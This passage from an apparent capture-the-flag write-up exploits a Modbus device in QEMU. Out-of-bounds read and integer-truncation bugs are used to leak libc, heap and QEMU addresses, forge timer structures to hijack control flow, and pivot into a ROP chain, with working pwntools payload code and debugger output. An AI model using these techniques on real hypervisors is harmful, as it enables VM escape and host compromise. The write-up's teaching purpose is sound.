For example, count=256 overflows by 512 bytes and count=128 by 256 bytes. Note that $\Delta$ is counted from the end of the payload area: the first two of these bytes land in the two bytes reserved for the CRC, so the number of bytes written past the requested allocation size is $\Delta - 2$.
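The size arithmetic above is easy to get wrong by one, so here is a small Python sketch that reproduces it. The function name fc03_sizes is made up for this illustration; it only models the integer truncation, not the heap itself.

```python
def fc03_sizes(count):
    """Return (out_len, delta) for an FC03 request with this register count.

    out_len: size passed to g_malloc()
    delta:   register bytes written past the intended payload area
    """
    byte_count = (2 * count) & 0xFF      # uint8_t byte_count = count * 2;
    out_len = 3 + byte_count + 2         # header + payload + CRC
    written = 2 * count                  # bytes the copy loop really stores at out[3...]
    delta = written - byte_count
    return out_len, delta


for count in (1, 127, 128, 256):
    out_len, delta = fc03_sizes(count)
    print(f"count={count:3d} out_len={out_len:3d} delta={delta}")
```

For count ≤ 127 the delta is 0 and the reply is well formed; from count = 128 on, the allocation shrinks back to a few bytes while the loop still copies 2*count bytes.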
0x10: out-of-bounds write

```c
static void modbus_handle_fc10(ModbusRtuState *s, const uint8_t *req)
{
    const uint8_t addr = req[0];
    const uint16_t start = be16_load(&req[2]);
    const uint16_t count = be16_load(&req[4]);
    const uint8_t byte_count = req[6];

    /* Same truncated address check as in FC03. */
    if (count == 0 || (uint16_t)(start + count) > 0x100U) {
        modbus_send_exception(s, addr, MODBUS_FC_WRITE_MULTIPLE,
                              MODBUS_EX_ILLEGAL_DATA_ADDR);
        return;
    }

    if (byte_count != 2 * count) {
        modbus_send_exception(s, addr, MODBUS_FC_WRITE_MULTIPLE,
                              MODBUS_EX_ILLEGAL_DATA_VALUE);
        return;
    }

    for (uint16_t i = 0; i < count; i++) {
        uint16_t v = be16_load(&req[7 + 2 * i]);
        /* start + i is not truncated: out-of-bounds write. */
        s->regs[start + i] = v;
    }

    uint8_t out[8];
    out[0] = addr;
    out[1] = MODBUS_FC_WRITE_MULTIPLE;
    be16_store(&out[2], start);
    be16_store(&out[4], count);
    uint16_t crc = modbus_crc16(out, 6);
    out[6] = (uint8_t)(crc & 0xFF);
    out[7] = (uint8_t)(crc >> 8);
    modbus_send(s, out, sizeof(out));
}
```
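The written byte range is [2*start, 2*(start + count) - 1] (relative to regs_base).
To write data, start and count must satisfy the following:
Pass the address check (same 16-bit wrap-around): count >= 1 and (uint16_t)(start + count) <= 0x100
Pass the length check: byte_count == 2*count
Fit in the receive buffer: frame length 9 + byte_count ≤ 260 → 2*count ≤ 251 → count ≤ 125 (otherwise the whole frame does not fit in rx_buf and can never be parsed in one piece)
Formally, all of the following must hold: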
Address check (same 16-bit wrap-around):

$$
\mathbf{count} \ge 1 \quad\text{and}\quad \bigl((\mathbf{start}+\mathbf{count}) \bmod 2^{16}\bigr) \le 256,
$$

which is equivalent to:

$$
\boxed{\ \mathbf{start} \in \bigl[-\mathbf{count},\ 256-\mathbf{count}\bigr] \pmod{2^{16}}\ }.
$$

Length consistency check:

$$
\boxed{\, \text{byte\_count} = 2\cdot\mathbf{count} \,}.
$$

Request frame length limited by RX = 260 (the length test in modbus_try_parse):

$$
9 + 2\cdot\mathbf{count} \le 260 \ \Longrightarrow\ \boxed{\, \mathbf{count} \le 125 \,}.
$$
The write loop indexes with the real, untruncated index:

$$
\texttt{s->regs[start + i]} = \texttt{be16\_load(...)},\quad i = 0 \dots \mathbf{count}-1.
$$

The byte range relative to regs_base is:

$$
\boxed{\ \bigl[\, 2\cdot\mathbf{start},\ 2\cdot(\mathbf{start}+\mathbf{count})-1 \,\bigr]\ }
$$

with a total length of:

$$
\boxed{\, 2\cdot\mathbf{count}\ \text{bytes} \,}.
$$

When $\mathbf{start} \ge 256$ or $\mathbf{start}+\mathbf{count}-1 \ge 256$, this range leaves the valid area and becomes an out-of-bounds write into the memory after regs.
Largest out-of-bounds write in a single frame (250 bytes): $\mathbf{count}=125$ (limited by RX), which covers:

$$
\bigl[\, 2\cdot\mathbf{start},\ 2\cdot(\mathbf{start}+125)-1 \,\bigr].
$$

Choosing $\mathbf{start}$ from the high interval of the allowed set (for example $[\mathrm{0xFF83} \dots \mathrm{0xFFFF}]$) both passes the check and lands outside regs.
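The three constraints on an FC10 request (address check, length check, RX buffer limit) can be enforced on the client side before a frame is sent. The following Python sketch builds such a frame; build_fc10 is a hypothetical helper written for this illustration, and the CRC routine is the same port of modbus_crc16 as in the device source.

```python
import struct

RX_BUF_SIZE = 260  # sizeof(rx_buf) in ModbusRtuState


def modbus_crc16(data: bytes) -> int:
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc


def build_fc10(unit_id: int, start: int, values) -> bytes:
    """Hypothetical helper: Write Multiple Registers frame for 16-bit `values`."""
    count = len(values)
    if not 1 <= count <= 125:
        raise ValueError("count must be in 1..125 to fit the 260-byte rx_buf")
    if not 0 <= start <= 0xFFFF:
        raise ValueError("start is a 16-bit field")
    if ((start + count) & 0xFFFF) > 0x100:
        raise ValueError("device would answer ILLEGAL_DATA_ADDR")
    # addr, func, start, count (big-endian), byte_count == 2*count
    head = struct.pack(">BBHHB", unit_id, 0x10, start, count, 2 * count)
    data = b"".join(struct.pack(">H", v & 0xFFFF) for v in values)
    body = head + data
    frame = body + struct.pack("<H", modbus_crc16(body))
    assert len(frame) == 9 + 2 * count <= RX_BUF_SIZE
    return frame


# Largest single-frame write: 125 registers starting at the wrapped index 0xFF83.
frame = build_fc10(1, 0xFF83, [0x4141] * 125)
print(len(frame))  # 259
```

Registers are sent big-endian and stored by the device as native uint16_t values, so a payload meant to appear as raw little-endian bytes in memory has to be byte-swapped per 16-bit word before it is passed in.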
Exploitation

Leaking addresses

Addresses are leaked with the 0x03 out-of-bounds read:

```python
leak = fc03_req(0, 0xff81, 127)[4:]
print(hexdump(leak))
libc.address = u64(leak[0x38:0x38 + 8]) - 0x203b60
success("libc base: " + hex(libc.address))
heap_base = u64(leak[0x48:0x48 + 8]) - 0xa4270
success("heap base: " + hex(heap_base))
qemu.address = u64(leak[0xe0:0xe0 + 8]) - 0x9ea35e
success("qemu base: " + hex(qemu.address))
```
00000000 3a 3a 76 6d 73 74 61 74 65 2d 69 66 00 55 00 00 │::vm│ stat│ e-if│ · U·· │
00000010 21 00 00 00 00 00 00 00 70 63 69 2d 64 65 76 69 │!··· │ ···· │ pci-│ devi│
00000020 63 65 3a 3a 76 6d 73 74 61 74 65 2d 69 66 00 00 │ce::│ vmst│ ate-│ if·· │
00000030 31 00 00 00 00 00 00 00 60 3b 80 f7 ff 7f 00 00 │1··· │ ···· │ `;··│ · · ·· │
00000040 60 3b 80 f7 ff 7f 00 00 70 92 57 57 55 55 00 00 │`;··│ · · ·· │ p· WW│ UU·· │
00000050 50 91 57 57 55 55 00 00 70 9c 57 57 55 55 00 00 │P· WW│ UU·· │ p· WW│ UU·· │
00000060 21 00 00 00 00 00 00 00 00 a5 57 57 55 55 00 00 │!··· │ ···· │ · · WW│ UU·· │
00000070 f0 aa 57 57 55 55 00 00 61 62 6c 65 00 00 00 00 │·· WW│ UU·· │ able│ ···· │
00000080 21 00 00 00 00 00 00 00 06 00 00 00 05 00 00 00 │!··· │ ···· │· ··· │· ··· │
00000090 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 │· ··· │ ···· │· ··· │ ···· │
000000a0 21 00 00 00 00 00 00 00 6f 6e 2f 6f 66 66 00 00 │!··· │ ···· │ on/o│ ff·· │
000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │···· │ ···· │ ···· │ ···· │
000000c0 61 00 00 00 00 00 00 00 50 98 57 57 55 55 00 00 │a··· │ ···· │ P· WW│ UU·· │
000000d0 70 98 57 57 55 55 00 00 00 00 00 00 00 00 00 00 │p· WW│ UU·· │ ···· │ ···· │
000000e0 5e e3 f3 55 55 55 00 00 ec e3 f3 55 55 55 00 00 │^·· U│ UU·· │··· U│ UU·· │
000000f0 00 00 00 00 00 00 00 00 b6 f4 │···· │ ···· │·· │
000000fa
[+ ] libc base: 0x7ffff7600000
[+ ] heap base: 0x5555574d5000
[+ ] qemu base: 0x555555554000
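Debugging shows that this data leaks a heap address, the libc base address and the program base address. Repeated runs show that the contents of this region are very stable.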
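As a sanity check, the three base addresses can be recomputed by hand from the hexdump. The sketch below copies the relevant 8-byte fields from the dump rows at offsets 0x38, 0x48 and 0xe0 and applies the same offsets as the exploit snippet; it uses only the standard library in place of pwntools' u64, and the helper name u64_at is made up for this illustration.

```python
import struct


def u64_at(buf: bytes, off: int) -> int:
    """Little-endian 64-bit load, equivalent to pwntools u64(buf[off:off+8])."""
    return struct.unpack_from("<Q", buf, off)[0]


# Rebuild only the fields of interest; all other bytes are left as zero.
leak = bytearray(0xFA)
leak[0x38:0x40] = bytes.fromhex("603b80f7ff7f0000")  # main_arena+160
leak[0x48:0x50] = bytes.fromhex("7092575755550000")  # heap pointer
leak[0xE0:0xE8] = bytes.fromhex("5ee3f35555550000")  # pointer into the QEMU binary

libc_base = u64_at(leak, 0x38) - 0x203B60
heap_base = u64_at(leak, 0x48) - 0xA4270
qemu_base = u64_at(leak, 0xE0) - 0x9EA35E

print(hex(libc_base))  # 0x7ffff7600000
print(hex(heap_base))  # 0x5555574d5000
print(hex(qemu_base))  # 0x555555554000
```

All three results are page aligned, which is a quick way to confirm that the offsets fit this particular libc and QEMU build; a different build would need different constants.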
pwndbg> u
► 0x555555962f27 movzx eax , word ptr [ rax + rdx * 2 + 2 ] EAX , [0x555557579724 ] => 0x6970
0x555555962f2c mov word ptr [ rbp - 0x1a ], ax
0x555555962f30 movzx eax , word ptr [ rbp - 0x1a ] EAX , [0x7fffffffd7e6 ]
0x555555962f34 shr ax , 8
0x555555962f38 mov ecx , eax
0x555555962f3a mov rax , qword ptr [ rbp - 0x18 ] RAX , [0x7fffffffd7e8 ]
0x555555962f3e lea rdx , [ rax + 1 ]
0x555555962f42 mov qword ptr [ rbp - 0x18 ], rdx
0x555555962f46 mov rdx , qword ptr [ rbp - 8 ] RDX , [0x7fffffffd7f8 ]
0x555555962f4a add rax , rdx
0x555555962f4d mov edx , ecx
pwndbg> telescope 0x555557579724+4 32
00:0000│ 0x555557579728 ◂— '::vmstate-if'
01:0008│ 0x555557579730 ◂— 0x550066692d65 /* 'e-if' */
02:0010│ 0x555557579738 ◂— 0x21 /* '!' */
03:0018│ 0x555557579740 ◂— 'pci-device::vmstate-if'
04:0020│ 0x555557579748 ◂— 'ce::vmstate-if'
05:0028│ 0x555557579750 ◂— 0x66692d657461 /* 'ate-if' */
06:0030│ 0x555557579758 ◂— 0x31 /* '1' */
07:0038│ 0x555557579760 —▸ 0x7ffff7803b60 (main_arena+160) —▸ 0x7ffff7803b50 (main_arena+144) —▸ 0x7ffff7803b40 (main_arena+128) —▸ 0x555557557ad0 ◂— ...
08:0040│ 0x555557579768 —▸ 0x7ffff7803b60 (main_arena+160) —▸ 0x7ffff7803b50 (main_arena+144) —▸ 0x7ffff7803b40 (main_arena+128) —▸ 0x555557557ad0 ◂— ...
09:0048│ 0x555557579770 —▸ 0x555557579270 —▸ 0x5555575792d0 ◂— 0x657a69736d6f72 /* 'romsize' */
0a:0050│ 0x555557579778 —▸ 0x555557579150 —▸ 0x555557579060 ◂— 0x72646461 /* 'addr' */
0b:0058│ 0x555557579780 —▸ 0x555557579c70 —▸ 0x555557579cd0 ◂— 'x-pcie-ext-tag'
0c:0060│ 0x555557579788 ◂— 0x21 /* '!' */
0d:0068│ 0x555557579790 —▸ 0x55555757a500 —▸ 0x55555757a340 —▸ 0x55555757a4c0 ◂— 'pci-piix::resettable'
0e:0070│ 0x555557579798 —▸ 0x55555757aaf0 —▸ 0x55555757a870 —▸ 0x55555757a6a0 —▸ 0x55555757a820 ◂— ...
0f:0078│ 0x5555575797a0 ◂— 0x656c6261 /* 'able' */
10:0080│ 0x5555575797a8 ◂— 0x21 /* '!' */
11:0088│ 0x5555575797b0 ◂— 0x500000006
12:0090│ 0x5555575797b8 ◂— 1
13:0098│ 0x5555575797c0 ◂— 1
14:00a0│ 0x5555575797c8 ◂— 0x21 /* '!' */
15:00a8│ 0x5555575797d0 ◂— 0x66666f2f6e6f /* 'on/off' */
16:00b0│ 0x5555575797d8 ◂— 0
17:00b8│ 0x5555575797e0 ◂— 0
18:00c0│ 0x5555575797e8 ◂— 0x61 /* 'a' */
19:00c8│ 0x5555575797f0 —▸ 0x555557579850 ◂— 'failover_pair_id'
1a:00d0│ 0x5555575797f8 —▸ 0x555557579870 ◂— 0x727473 /* 'str' */
1b:00d8│ 0x555557579800 ◂— 0
1c:00e0│ 0x555557579808 —▸ 0x555555f3e35e ◂— endbr64
1d:00e8│ 0x555557579810 —▸ 0x555555f3e3ec ◂— endbr64
1e:00f0│ 0x555557579818 ◂— 0
1f:00f8│ 0x555557579820 —▸ 0x555555f3f4b6 ◂— endbr64
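Hijacking control flow

Besides the out-of-bounds read, function 0x03 has an integer truncation that under-allocates the out buffer returned by g_malloc, so the same request also overflows the heap.

Debugging shows that, at allocation time, the data immediately following the free 0x20 chunk in tcache looks like this: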
pwndbg> u 1
► 0x555555962eb1 call g_malloc@plt <g_malloc@plt >
rdi : 5
rsi : 0x555557559a22 ◂— 0x4774800080ff0300
rdx : 0xff80
rcx : 0x74
0x555555962eb6 mov qword ptr [ rbp - 8 ], rax
0x555555962eba mov qword ptr [ rbp - 0x18 ], 0
pwndbg> bins
tcachebins
0x20 [ 2] : 0x555557557e90 —▸ 0x5555577ae010 ◂— 0
0x30 [ 6] : 0x5555577adf80 —▸ 0x555557559700 —▸ 0x5555577ae100 —▸ 0x5555577abbd0 —▸ 0x55555779ffc0 —▸ 0x5555577ab830 ◂— 0
0x60 [ 1] : 0x5555577aa8c0 ◂— 0
0x80 [ 2] : 0x5555577acf60 —▸ 0x5555577ab660 ◂— 0
0x90 [ 7] : 0x5555576a60d0 —▸ 0x55555755c980 —▸ 0x55555755c8f0 —▸ 0x5555574dabb0 —▸ 0x5555574da640 —▸ 0x5555574da5b0 —▸ 0x5555574da0e0 ◂— 0
0xe0 [ 4] : 0x5555577abc40 —▸ 0x5555577ab860 —▸ 0x5555577ab530 —▸ 0x5555577ab450 ◂— 0
0xf0 [ 2] : 0x5555577aad10 —▸ 0x5555577aabb0 ◂— 0
0x100 [ 7] : 0x555557558c30 —▸ 0x555557558b30 —▸ 0x555557557700 —▸ 0x555557557600 —▸ 0x555557557500 —▸ 0x555557557400 —▸ 0x5555577ab940 ◂— 0
0x110 [ 7] : 0x55555755d230 —▸ 0x55555755d120 —▸ 0x5555574f48d0 —▸ 0x5555574f2dc0 —▸ 0x5555574f2cb0 —▸ 0x5555574db320 —▸ 0x5555574db210 ◂— 0
0x1e0 [ 1] : 0x5555574d52a0 ◂— 0
0x210 [ 6] : 0x55555755fea0 —▸ 0x55555755e390 —▸ 0x55555755e180 —▸ 0x5555574f8280 —▸ 0x5555574f4bf0 —▸ 0x5555574f49e0 ◂— 0
0x410 [ 5] : 0x5555575600b0 —▸ 0x5555574ff7e0 —▸ 0x5555574f88a0 —▸ 0x5555574f8490 —▸ 0x5555574d5500 ◂— 0
fastbins
empty
unsortedbin
all : 0x5555577ad560 —▸ 0x7ffff7803b20 (main_arena+96) ◂— 0x5555577ad560
smallbins
0x20 : 0x555557557ad0 —▸ 0x555557557950 —▸ 0x5555577a12b0 —▸ 0x7ffff7803b30 (main_arena+112) ◂— 0x555557557ad0
0x60 : 0x555557559690 —▸ 0x5555577ad130 —▸ 0x7ffff7803b70 (main_arena+176) ◂— 0x555557559690
largebins
0x1000-0x11f0 : 0x5555577abd10 —▸ 0x7ffff7804140 (main_arena+1664) ◂— 0x5555577abd10
pwndbg> telescope 0x555557557e90+0x10 20
00:0000│ 0x555557557ea0 ◂— 0x80
01:0008│ 0x555557557ea8 ◂— 0x81
02:0010│ 0x555557557eb0 —▸ 0x5555574d40a0 —▸ 0x555557558380 ◂— 0x5555574d40a0
03:0018│ 0x555557557eb8 ◂— 0
... ↓ 5 skipped
09:0048│ 0x555557557ee8 ◂— 0x100000000
0a:0050│ 0x555557557ef0 ◂— 0
0b:0058│ 0x555557557ef8 ◂— 0
0c:0060│ 0x555557557f00 —▸ 0x5555575583c8 —▸ 0x555557557eb0 —▸ 0x5555574d40a0 —▸ 0x555557558380 ◂— ...
0d:0068│ 0x555557557f08 —▸ 0x555555c13703 ◂— endbr64
0e:0070│ 0x555557557f10 ◂— 0
0f:0078│ 0x555557557f18 ◂— 0x100000000
10:0080│ 0x555557557f20 ◂— 0
11:0088│ 0x555557557f28 ◂— 0x81
12:0090│ 0x555557557f30 —▸ 0x5555574d40b0 —▸ 0x555557558400 ◂— 0x5555574d40b0
13:0098│ 0x555557557f38 ◂— 0
In IDA, the address of main_loop_tlg can be located through the timer_init_full function:
void __fastcall timer_init_full(
        QEMUTimer *ts,
        QEMUTimerListGroup *timer_list_group,
        QEMUClockType type,
        int scale,
        int attributes,
        QEMUTimerCB *cb,
        void *opaque)
{
  QEMUTimerListGroup *timer_list_groupa;

  timer_list_groupa = timer_list_group;
  if ( !timer_list_group )
    timer_list_groupa = &main_loop_tlg;
  ts->timer_list = timer_list_groupa->tl[type];
  ts->cb = cb;
  ts->opaque = opaque;
  ts->scale = scale;
  ts->attributes = attributes;
  ts->expire_time = -1;
}
main_loop_tlg has type QEMUTimerListGroup, which is really just an array of QEMUTimerList pointers:
struct QEMUTimerListGroup
{
  QEMUTimerList *tl[4];
};
Debugging shows that the QEMUTimerList pointed to by the first entry sits right next to the free 0x20 tcachebin chunk shown earlier:
pwndbg> telescope $rebase(0x1F80080)
00:0000│ 0x5555574d4080 —▸ 0x555557557eb0 —▸ 0x5555574d40a0 —▸ 0x555557558380 ◂— 0x5555574d40a0
01:0008│ 0x5555574d4088 —▸ 0x555557557f30 —▸ 0x5555574d40b0 —▸ 0x555557558400 ◂— 0x5555574d40b0
02:0010│ 0x5555574d4090 —▸ 0x555557557fb0 —▸ 0x5555574d40c0 —▸ 0x555557558480 ◂— 0x5555574d40c0
03:0018│ 0x5555574d4098 —▸ 0x555557558030 —▸ 0x5555574d40d0 —▸ 0x555557558500 ◂— 0x5555574d40d0
We can therefore try to overflow into the QEMUTimerList structure and hijack control flow.
payload_addr = heap_base + 0x82eb0

# Fake QEMUTimerList; the two placeholders are patched once the addresses are known.
payload = b""
payload += flat({
    0: p64(0xdeaddead),            # clock pointer (placeholder)
    0x8: flat({
        0x0: flat(
            p32(0), p32(0), p32(0), p32(0), p32(0),
            p16(0), p16(0),
            p64(0),
            p64(0)
        ),
        0x34: p8(1)
    }),
    0x40: p64(0xbeefbeef)          # active_timers pointer (placeholder)
})
payload = payload.replace(p64(0xbeefbeef), p64(payload_addr + len(payload)))

# Fake QEMUTimer: the callback at 0x10 and its argument at 0x18.
payload += flat({
    0x0: p64(0),
    0x10: p64(0xdeadbeef),
    0x18: b'a' * 8
})
payload = payload.replace(p64(0xdeaddead), p64(payload_addr + len(payload)))

# Fake clock object.
payload += flat({
    0x8: p32(0),
    0xc: p8(1),
})

payload = flat(
    {23: payload},
    filler=cyclic(250, n=8),
    length=250
)
print(hexdump(payload))
fc10_req(0, (0x10000 - 250 // 2), payload)
fc03_req(0, 0x10000 - 0x80, 0x80)
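The offset 23 in the payload above can be checked with a little arithmetic. The sketch below assumes that the FC03 response begins with a 3-byte header (unit id, function code, byte count), that each register occupies 2 bytes, and that out_buf is the head of the 0x20 tcache bin seen in the debugger (0x555557557e90). The helper name is hypothetical.

```python
RESP_HEADER = 3      # assumed: unit id, function code, byte count
BYTES_PER_REG = 2    # Modbus holding registers are 16 bits wide


def payload_offset_in_out_buf(read_start: int, write_start: int, flat_offset: int) -> int:
    """Byte offset inside out_buf at which payload byte `flat_offset` lands."""
    reg_gap = write_start - read_start          # registers read before the written area
    return RESP_HEADER + reg_gap * BYTES_PER_REG + flat_offset


read_start = 0x10000 - 0x80          # start register of the overflowing FC03 read
write_start = 0x10000 - 250 // 2     # start register of the FC10 write
out_buf = 0x555557557e90             # head of the 0x20 tcache bin in the debugger dump

offset = payload_offset_in_out_buf(read_start, write_start, 23)
target = out_buf + offset
print(hex(offset), hex(target))
```

With these numbers the fake structure starts 0x20 bytes into out_buf, at 0x555557557eb0, which is the address stored in main_loop_tlg.tl[0] in the telescope output.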
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────
* RAX 0x6161616161616161 ('aaaaaaaa')
RBX 0x7fffffffec98 —▸ 0x7fffffffee94 ◂— '/home/ctf/qemu-system-x86_64'
RCX 0
* RDX 0xdeadbeef
* RDI 0x6161616161616161 ('aaaaaaaa')
RSI 0
* R8 0x13bf9aa800000
* R9 0
* R10 0x7ffff7fbf080
* R11 0x23430a
R12 9
R13 0
R14 0x5555565b3838 —▸ 0x55555588a750 ◂— endbr64
R15 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
* RBP 0x7fffffffea60 —▸ 0x7fffffffea80 —▸ 0x7fffffffeaa0 —▸ 0x7fffffffeaf0 —▸ 0x7fffffffeb10 ◂— ...
* RSP 0x7fffffffea08 —▸ 0x5555561820fd ◂— mov rax , qword ptr [ rip + 0x132862c ]
* RIP 0xdeadbeef
─────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────
Invalid address 0xdeadbeef
───────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffea08 —▸ 0x5555561820fd ◂— mov rax , qword ptr [ rip + 0x132862c ]
01:0008│-050 0x7fffffffea10 ◂— 9 /* '\t' */
02:0010│-048 0x7fffffffea18 —▸ 0x555557557eb0 —▸ 0x555557557f18 ◂— 0
03:0018│-040 0x7fffffffea20 —▸ 0x5555565b3838 —▸ 0x55555588a750 ◂— endbr64
04:0020│-038 0x7fffffffea28 —▸ 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
05:0028│-030 0x7fffffffea30 —▸ 0x555557557ef8 ◂— 0x000000000000ffff
06:0030│-028 0x7fffffffea38 ◂— 0x178a21f0af24
07:0038│-020 0x7fffffffea40 ◂— 0xdeadbeef
─────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────
► 0 0xdeadbeef None
1 0x5555561820fd None
2 0x5555561821b3 None
3 0x55555618253f None
4 0x55555617c9c8 None
5 0x555555c4286e None
6 0x555556088bf3 None
7 0x555556088cb1 None
─────────────────────────────────────────────────────[ THREADS (2 TOTAL) ]─────────────────────────────────────────────────────
► 1 "qemu-system-x86 " stopped : 0xdeadbeef
2 "qemu-system-x86 " stopped : 0x7ffff772728d <syscall+29 >
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg>
The function that hands control to our callback is timerlist_run_timers.
bool __cdecl timerlist_run_timers(QEMUTimerList *timer_list)
{
  QEMUClockType type;
  bool progress;
  QEMUTimer *ts;
  int64_t current_time;
  QEMUTimerCB *cb;
  void *opaque;

  progress = 0;
  if ( !timer_list->active_timers )
    return 0;
  qemu_event_reset(&timer_list->timers_done_ev);
  if ( timer_list->clock->enabled )
  {
    type = timer_list->clock->type;
    if ( type != QEMU_CLOCK_VIRTUAL_RT )
    {
      if ( type == QEMU_CLOCK_HOST && !replay_checkpoint(ReplayCheckpoint::CHECKPOINT_CLOCK_HOST) )
        goto out;
LABEL_9:
      current_time = qemu_clock_get_ns(timer_list->clock->type);
      qemu_mutex_lock_func(&timer_list->active_timers_lock, "../util/qemu-timer.c", 534);
      while ( 1 )
      {
        ts = timer_list->active_timers;
        if ( !ts || !timer_expired_ns(ts, current_time) )
          break;
        if ( replay_mode
          && timer_list->clock->type == QEMU_CLOCK_VIRTUAL
          && (ts->attributes & 1) == 0
          && !replay_checkpoint(ReplayCheckpoint::CHECKPOINT_CLOCK_VIRTUAL) )
        {
          qemu_mutex_unlock_impl(&timer_list->active_timers_lock, "../util/qemu-timer.c", 550);
          goto out;
        }
        timer_list->active_timers = ts->next;
        ts->next = 0;
        ts->expire_time = -1;
        cb = ts->cb;
        opaque = ts->opaque;
        qemu_mutex_unlock_impl(&timer_list->active_timers_lock, "../util/qemu-timer.c", 562);
        cb(opaque);
        qemu_mutex_lock_func(&timer_list->active_timers_lock, "../util/qemu-timer.c", 564);
        progress = 1;
      }
      qemu_mutex_unlock_impl(&timer_list->active_timers_lock, "../util/qemu-timer.c", 568);
      goto out;
    }
    if ( replay_checkpoint(ReplayCheckpoint::CHECKPOINT_CLOCK_VIRTUAL_RT) )
      goto LABEL_9;
  }
out:
  qemu_event_set(&timer_list->timers_done_ev);
  return progress;
}
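To see which fields of the forged structures the decompiled function actually reads, the path to cb(opaque) can be replayed on a byte buffer. This is only a sketch: the field offsets are taken from the payload layout used in this write-up and are assumed to match the target build, the expiry test is assumed to be expire_time <= current_time, and the replay and mutex logic is left out. The helper names are hypothetical.

```python
import struct

BASE = 0x555557557eb0  # address of the forged QEMUTimerList in the debugger session

# Offsets assumed from the payload layout in this write-up.
TL_CLOCK, TL_ACTIVE_TIMERS = 0x00, 0x40
TS_EXPIRE, TS_CB, TS_OPAQUE = 0x00, 0x10, 0x18
CLK_TYPE, CLK_ENABLED = 0x08, 0x0C


def build_fake(cb: int, opaque: int) -> bytes:
    """Lay out a fake timer list, timer, and clock back to back starting at BASE."""
    timer_list, timer, clock = bytearray(0x48), bytearray(0x20), bytearray(0x10)
    timer_addr = BASE + len(timer_list)
    clock_addr = timer_addr + len(timer)
    struct.pack_into("<Q", timer_list, TL_CLOCK, clock_addr)
    timer_list[0x08 + 0x34] = 1                      # byte the payload sets inside the mutex
    struct.pack_into("<Q", timer_list, TL_ACTIVE_TIMERS, timer_addr)
    struct.pack_into("<q", timer, TS_EXPIRE, 0)      # 0 means "already expired"
    struct.pack_into("<Q", timer, TS_CB, cb)
    struct.pack_into("<Q", timer, TS_OPAQUE, opaque)
    struct.pack_into("<I", clock, CLK_TYPE, 0)
    clock[CLK_ENABLED] = 1
    return bytes(timer_list + timer + clock)


def read_u64(mem: bytes, addr: int) -> int:
    return struct.unpack_from("<Q", mem, addr - BASE)[0]


def simulate_run_timers(mem: bytes, now_ns: int):
    """Return (cb, opaque) if the first timer would fire, else None."""
    active = read_u64(mem, BASE + TL_ACTIVE_TIMERS)
    if not active:
        return None
    clock = read_u64(mem, BASE + TL_CLOCK)
    if not mem[clock - BASE + CLK_ENABLED]:
        return None
    expire = struct.unpack_from("<q", mem, active - BASE + TS_EXPIRE)[0]
    if expire > now_ns:
        return None
    return read_u64(mem, active + TS_CB), read_u64(mem, active + TS_OPAQUE)


mem = build_fake(cb=0xdeadbeef, opaque=0x6161616161616161)
print([hex(v) for v in simulate_run_timers(mem, now_ns=1)])
```

The returned pair corresponds to the RIP and RDI values in the crash dump: the callback pointer becomes the new instruction pointer and opaque is passed as the first argument.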
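When forging the QEMUTimerList, two points need particular attention:
Arbitrary Code Execution
At the moment control flow is hijacked, both rax and rdi are under our control. We can use the gadget below to pivot the stack into memory we control and then run a ROP chain: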
► 0x555555c5dc51 push rax
0x555555c5dc52 add byte ptr [ rax - 0x75 ], cl [0x555557557eab ] <= 0x61 (0x61 + 0x0)
0x555555c5dc55 pop rbp RBP => 0x555557557f20
0x555555c5dc56 clc
0x555555c5dc57 leave
0x555555c5dc58 xor eax , eax EAX => 0
0x555555c5dc5a xor edx , edx EDX => 0
0x555555c5dc5c xor ecx , ecx ECX => 0
0x555555c5dc5e xor esi , esi ESI => 0
0x555555c5dc60 xor edi , edi EDI => 0
0x555555c5dc62 ret <__spawnix+875 >
↓
0x7ffff770f78b <__spawnix+875> pop rdi RDI => 0xa
0x7ffff770f78c <__spawnix+876> ret <eval_expr_multdiv+157 >
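The effect of the gadget on rsp can be followed with a small model. The sketch below treats memory as a dictionary of 64-bit slots and emulates only the instructions that move the stack (push rax, pop rbp, leave, ret). The `add byte ptr [rax - 0x75], cl` instruction is ignored apart from noting that it needs that address to be writable. The function name and the junk value are hypothetical; the addresses come from the trace above.

```python
def emulate_pivot(mem: dict, rax: int, rsp: int):
    """Emulate push rax; pop rbp; leave; ret and return (rip, rsp)."""
    # push rax
    rsp -= 8
    mem[rsp] = rax
    # add byte ptr [rax - 0x75], cl  -> side effect only; [rax - 0x75] must be writable
    # pop rbp
    rbp = mem[rsp]
    rsp += 8
    # leave  ==  mov rsp, rbp ; pop rbp
    rsp = rbp
    rbp = mem[rsp]
    rsp += 8
    # ret
    rip = mem[rsp]
    rsp += 8
    return rip, rsp


rax = 0x555557557f20            # controlled pointer (value of RBP after `pop rbp` in the trace)
pop_rdi_ret = 0x7ffff770f78b    # first ROP gadget seen in the trace
mem = {
    rax: 0x4141414141414141,    # consumed by `leave` as the saved rbp (junk)
    rax + 8: pop_rdi_ret,       # first entry of the ROP chain
    rax + 16: 0xA,              # value popped into rdi
}

rip, rsp = emulate_pivot(mem, rax, rsp=0x7fffffffea08)
print(hex(rip), hex(rsp))
```

The chain therefore has to start at rax + 8, because the qword at rax is consumed by `leave`.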
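As for getting output back: a TCP server uses two different sockets, one for listening and one for each established connection:
Listening phase: the process calls socket() → bind() → listen() and obtains a listening FD (used only to queue incoming connections, never to transfer data).
After a connection is established: when a client connects, the kernel creates a brand-new connection socket derived from the listening socket and places it on the accept queue. The process calls accept() and receives a new FD (used to exchange data with that client). The listening FD stays open to accept further connections.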
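The distinction between the two descriptors is easy to observe on loopback. The following minimal sketch uses only Python's standard socket module; the function name is hypothetical and the port is chosen by the kernel.

```python
import socket


def listen_and_accept(message: bytes = b"ping"):
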